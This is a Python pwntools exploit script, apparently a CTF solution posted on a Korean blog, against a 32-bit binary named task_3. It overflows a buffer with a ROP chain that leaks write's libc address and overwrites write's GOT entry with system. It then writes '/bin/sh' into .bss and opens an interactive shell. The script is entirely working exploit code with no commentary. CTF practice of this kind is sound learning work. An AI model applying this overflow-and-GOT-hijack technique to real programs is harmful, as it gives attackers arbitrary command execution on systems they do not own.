from pwn import *

r = process("./task_3")
elf = ELF("./task_3")

read_plt = elf.plt['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
pppr = 0x0804855d
bss = elf.bss()
binsh = "/bin/sh\x00"

payload = "\x90"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(6)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

payload += p32(write_plt)
payload += "\x90"*4
payload += p32(bss)

r.sendline(payload)

libc_write = u32(r.recv(4))
libc_system = libc_write - 0x9add0

log.info("libc_write = {}".format(hex(libc_write)))
log.info("libc_system = {}".format(hex(libc_system)))
r.send(p32(libc_system))
r.send(binsh)

r.interactive()

'CTF' 카테고리의 다른 글

CSAW2016 tutorial  (0) 2019.02.01
TJCTF 2016 oneshot  (0) 2019.01.24
SEC-T CTF PingPong  (0) 2018.09.16
BCTF 2016 bcloud  (0) 2018.08.24
Defcon 2014 Babyfirst heap  (0) 2018.08.16

+ Recent posts

티스토리툴바